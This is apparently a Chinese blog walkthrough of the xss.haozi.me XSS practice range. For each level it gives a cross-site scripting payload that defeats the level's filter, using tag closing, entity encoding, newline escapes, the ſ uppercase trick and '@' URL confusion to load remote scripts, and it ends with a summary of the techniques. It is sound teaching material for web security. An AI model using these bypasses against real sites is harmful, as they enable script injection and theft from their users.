<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"sunian19.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="所使用靶场  为了避免错误，建议谷歌打开部署靶场https:&#x2F;&#x2F;xss.haozi.me&#x2F;#&#x2F;0x00">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;XSS靶场通关&#39;">
<meta property="og:url" content="https://sunian19.github.io/2019/12/10/XSS%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/index.html">
<meta property="og:site_name" content="zer0_c|imb&#39;s blog">
<meta property="og:description" content="所使用靶场  为了避免错误，建议谷歌打开部署靶场https:&#x2F;&#x2F;xss.haozi.me&#x2F;#&#x2F;0x00">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sunian19.github.io/imgss/t57.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t58.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t59.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t60.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t61.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t62.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t63.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t64.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t65.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t66.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t67.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t68.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t69.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t70.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t71.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t72.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t73.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t74.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t75.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/t76.png">
<meta property="article:published_time" content="2019-12-10T17:54:41.000Z">
<meta property="article:modified_time" content="2024-01-18T16:56:01.844Z">
<meta property="article:author" content="zer0_c|imb">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://sunian19.github.io/imgss/t57.png">


<link rel="canonical" href="https://sunian19.github.io/2019/12/10/XSS%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://sunian19.github.io/2019/12/10/XSS%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/","path":"2019/12/10/XSS靶场通关/","title":"'XSS靶场通关'"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>'XSS靶场通关' | zer0_c|imb's blog</title>
  

  <script src="/js/third-party/analytics/baidu-analytics.js"></script>
  <script async src="https://hm.baidu.com/hm.js?48584c486973b4bf025a425c3d7b4007"></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">zer0_c|imb's blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%89%80%E4%BD%BF%E7%94%A8%E9%9D%B6%E5%9C%BA"><span class="nav-number">1.</span> <span class="nav-text">所使用靶场</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00"><span class="nav-number">2.</span> <span class="nav-text">0x00</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01"><span class="nav-number">3.</span> <span class="nav-text">0x01</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02"><span class="nav-number">4.</span> <span class="nav-text">0x02</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03"><span class="nav-number">5.</span> <span class="nav-text">0x03</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04"><span class="nav-number">6.</span> <span class="nav-text">0x04</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05"><span class="nav-number">7.</span> <span class="nav-text">0x05</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x06"><span class="nav-number">8.</span> <span class="nav-text">0x06</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x07"><span class="nav-number">9.</span> <span class="nav-text">0x07</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x08"><span class="nav-number">10.</span> <span class="nav-text">0x08</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x09"><span class="nav-number">11.</span> <span class="nav-text">0x09</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x0A"><span class="nav-number">12.</span> <span class="nav-text">0x0A</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x0B"><span class="nav-number">13.</span> <span class="nav-text">0x0B</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x0C"><span class="nav-number">14.</span> <span class="nav-text">0x0C</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x0D"><span class="nav-number">15.</span> <span class="nav-text">0x0D</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x0E"><span class="nav-number">16.</span> <span class="nav-text">0x0E</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x0F"><span class="nav-number">17.</span> <span class="nav-text">0x0F</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x10"><span class="nav-number">18.</span> <span class="nav-text">0x10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x11"><span class="nav-number">19.</span> <span class="nav-text">0x11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x12"><span class="nav-number">20.</span> <span class="nav-text">0x12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">21.</span> <span class="nav-text">总结</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zer0_c|imb"
      src="/imgss/touxiang.jpg">
  <p class="site-author-name" itemprop="name">zer0_c|imb</p>
  <div class="site-description" itemprop="description">忘川河畔彼岸花，红如鲜血似朱砂</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">98</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">40</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="mailto:lingyu195@gmail.com" title="E-Mail → mailto:lingyu195@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=3504078815" title="QQ → tencent:&#x2F;&#x2F;AddContact&#x2F;?fromId&#x3D;45&amp;fromSubId&#x3D;1&amp;subcmd&#x3D;all&amp;uin&#x3D;3504078815" rel="noopener" target="_blank"><i class="qq fa-fw"></i>QQ</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://www.ch4ser.top/" title="http:&#x2F;&#x2F;www.ch4ser.top&#x2F;" rel="noopener" target="_blank">ch4ser</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://hackergu.com/" title="http:&#x2F;&#x2F;hackergu.com&#x2F;" rel="noopener" target="_blank">Gu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://al0neranger.github.io/" title="https:&#x2F;&#x2F;al0neranger.github.io&#x2F;" rel="noopener" target="_blank">al0neranger</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/lyshark" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;lyshark" rel="noopener" target="_blank">lyshark</a>
        </li>
    </ul>
  </div>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sunian19.github.io/2019/12/10/XSS%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/imgss/touxiang.jpg">
      <meta itemprop="name" content="zer0_c|imb">
      <meta itemprop="description" content="忘川河畔彼岸花，红如鲜血似朱砂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zer0_c|imb's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          'XSS靶场通关'
        </h1>


        <div class="post-meta">
        
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2019-12-10 09:54:41" itemprop="dateCreated datePublished" datetime="2019-12-10T09:54:41-08:00">2019-12-10</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2024-01-18 08:56:01" itemprop="dateModified" datetime="2024-01-18T08:56:01-08:00">2024-01-18</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/XSS/" itemprop="url" rel="index"><span itemprop="name">XSS</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>

      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h3 id="所使用靶场">所使用靶场</h3>
<p><img src="/imgss/t57.png" alt=""><br>
为了避免错误，建议谷歌打开部署靶场<a target="_blank" rel="noopener" href="https://xss.haozi.me/#/0x00">https://xss.haozi.me/#/0x00</a></p>
<span id="more"></span>
<h3 id="0x00">0x00</h3>
<p>这关没啥好说的<br>
直接hackbar生成一个payload</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(1)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t58.png" alt=""></p>
<h3 id="0x01">0x01</h3>
<p>这关闭合一下前面的textarea标签</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;&#x2F;textarea&gt;&lt;script&gt;alert(1)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t59.png" alt=""></p>
<h3 id="0x02">0x02</h3>
<p>闭合标签</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;script&gt;alert(1)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t60.png" alt=""></p>
<h3 id="0x03">0x03</h3>
<p>这关过滤了小括号，所以我们用反引号代替</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert&#96;1&#96;&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t61.png" alt=""></p>
<h3 id="0x04">0x04</h3>
<p>过滤了小括号和反引号，我们还可以用编码绕过</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;&quot;x&quot; onerror&#x3D;&quot;alert&amp;#40;1&amp;#41;&quot;&gt;</span><br><span class="line">&lt;img src&#x3D;&quot;x&quot; onerror&#x3D;javascript:alert&amp;#x28;1&amp;#x29;&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t62.png" alt=""></p>
<h3 id="0x05">0x05</h3>
<p>这关如果用- - &gt;闭合会变成一个哭笑不得的表情，所以想办法闭合前面的注释就行</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--!&gt;&lt;img src&#x3D;&quot;x&quot; onerror&#x3D;&quot;alert&amp;#40;1&amp;#41;&quot;&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t63.png" alt=""></p>
<h3 id="0x06">0x06</h3>
<p>这关对auto/on开头=结尾的字符及&gt;进行转换为_下划线。我们用换行进行逃逸就好了</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">type&#x3D;&quot;image&quot; src&#x3D;&quot;xxx&quot; onerror</span><br><span class="line"></span><br><span class="line">&#x3D;&quot;alert(1)&quot;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t64.png" alt=""></p>
<h3 id="0x07">0x07</h3>
<p>匹配了尖括号&lt;&gt;开头结尾的字符串替换为空，利用浏览器的兼容性，可以通过少输入一个&gt;来绕过正则</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;&quot;x&quot; onerror&#x3D;&quot;alert(1)&quot;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t65.png" alt=""></p>
<h3 id="0x08">0x08</h3>
<p>这关把&quot;&lt;\style&gt;&quot;替换为/*坏人*/，但我们可以通过右括号&gt;换行进行逃逸</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;&#x2F;style</span><br><span class="line">&gt;</span><br><span class="line">&lt;img src&#x3D;&quot;x&quot; onerror&#x3D;&quot;alert(1);&quot;&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t66.png" alt=""></p>
<h3 id="0x09">0x09</h3>
<p>这关没有做任何过滤，但要包含指定网址</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">可以闭合src参数，写onload事件</span><br><span class="line">https:&#x2F;&#x2F;www.segmentfault.com&quot; onload&#x3D;alert(1)&gt;</span><br><span class="line">也可以先闭合script标签，然后注释掉后面</span><br><span class="line">https:&#x2F;&#x2F;www.segmentfault.com&quot;&gt;&lt;&#x2F;script&gt;&lt;script&gt;alert(1)&lt;&#x2F;script&gt;&#x2F;&#x2F;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t67.png" alt=""></p>
<h3 id="0x0A">0x0A</h3>
<p>这里用到一个知识点@，如果你访问的是 <a href="mailto:www.baidu.com@www.google.com">www.baidu.com@www.google.com</a>， 那么你最后进入的是谷歌的页面<br>
还是需要包含指定网址，过滤了关键字替换为html实体编码，所以我们包含作者的js，js中是alert(1)</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.segmentfault.com@xss.haozi.me&#x2F;j.js</span><br><span class="line">https:&#x2F;&#x2F;xssye.com&#x2F;iCfv</span><br></pre></td></tr></table></figure></div>
<p>在xss注入中属于引入漏洞页面<br>
理论上来说应该是可以的，但是XSS平台上的代码状态为blocked:origin，无法导入脚本，应该是浏览器的安全策略</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.segmentfault.com.haozi.me&#x2F;j.js</span><br></pre></td></tr></table></figure></div>
<p>最后使用以上url过的，加载了内容为alert(1)的js代码，可见就是浏览器安全策略的问题<br>
<img src="/imgss/t68.png" alt=""></p>
<h3 id="0x0B">0x0B</h3>
<p>这关把所有输入变成大写，注意 html 不严格区分大小写，js严格区分大小写。</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;x onerror&#x3D;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;1&amp;#41;&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t69.png" alt=""></p>
<h3 id="0x0C">0x0C</h3>
<p>和上一关一样，不过对script标签添加了过滤</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;x onerror&#x3D;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;1&amp;#41;&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t70.png" alt=""></p>
<h3 id="0x0D">0x0D</h3>
<p>过滤了&lt;/&quot;'符号，<br>
先用换行绕过//注释，再用- -&gt;忽略后面的引号和括号</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">alert(1);</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t71.png" alt=""></p>
<h3 id="0x0E">0x0E</h3>
<p>这关匹配了&lt;与字母的组合a-zA-Z，就是说&lt; s无法使用，所以我们用古英语ſ 在进行toUpperCase全大写过滤时，把ſ 替换成S。<br>
这个字母怎么打出来，要么复制我的，要么看链接<a target="_blank" rel="noopener" href="https://unicode-table.com/cn/017F/">https://unicode-table.com/cn/017F/</a></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;ſcript src&#x3D;&quot;https:&#x2F;&#x2F;www.segmentfault.com.haozi.me&#x2F;j.js&quot;&gt;&lt;&#x2F;ſcript&gt;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t72.png" alt=""></p>
<h3 id="0x0F">0x0F</h3>
<p>闭合console.error，再添加alert,然后注释掉后面的内容</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;);alert(1)&#x2F;&#x2F;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t73.png" alt=""></p>
<h3 id="0x10">0x10</h3>
<p>这关只要闭合data赋值就行,换行或者分号都可以</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1;alert(1)</span><br><span class="line">&quot;&quot;;alert(1)</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t74.png" alt=""></p>
<h3 id="0x11">0x11</h3>
<p>这关只要闭合就好了，可以用(&quot;也可以用//注释掉</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;);alert(1);&#x2F;&#x2F;</span><br><span class="line">&quot;);alert(1);(&quot;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t75.png" alt=""></p>
<h3 id="0x12">0x12</h3>
<p>这关会把&quot;双引号转译成/&quot;，所以我们反斜线再次转义即可</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">\&quot;);alert(1);&lt;&#x2F;script&gt;</span><br><span class="line">\&quot;);alert(1);&#x2F;&#x2F;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/t76.png" alt=""></p>
<h3 id="总结">总结</h3>
<p>1，html中，符号可相互替换，如单双引号，反引号，括号等<br>
2，注释符，单行//，多行&lt;！- - xxxx - - &gt;和&lt;!- xxxx -!&gt;<br>
3，换行可以绕过正则，因为正则只读取一行字符串检测<br>
4，浏览器的兼容性可以让缺少的标签或参数仍然运行，如&gt;右尖括号<br>
5，url中的@符可以让登陆网址为@后所指的网址<br>
6，html不区分大小写，而JS区分大小写<br>
7，特殊符号可以绕过大小写检测，如古英语ſ经过toUpperCase大写函数会变成S</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/XSS/" rel="tag"># XSS</a>
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"># 靶场</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2019/12/07/oracle%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5/" rel="prev" title="'oracle数据库注入'">
                  <i class="fa fa-chevron-left"></i> 'oracle数据库注入'
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2019/12/10/XSS%E6%8C%91%E6%88%98%E4%B9%8B%E6%97%85/" rel="next" title="'XSS挑战之旅'">
                  'XSS挑战之旅' <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zer0_c|imb</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
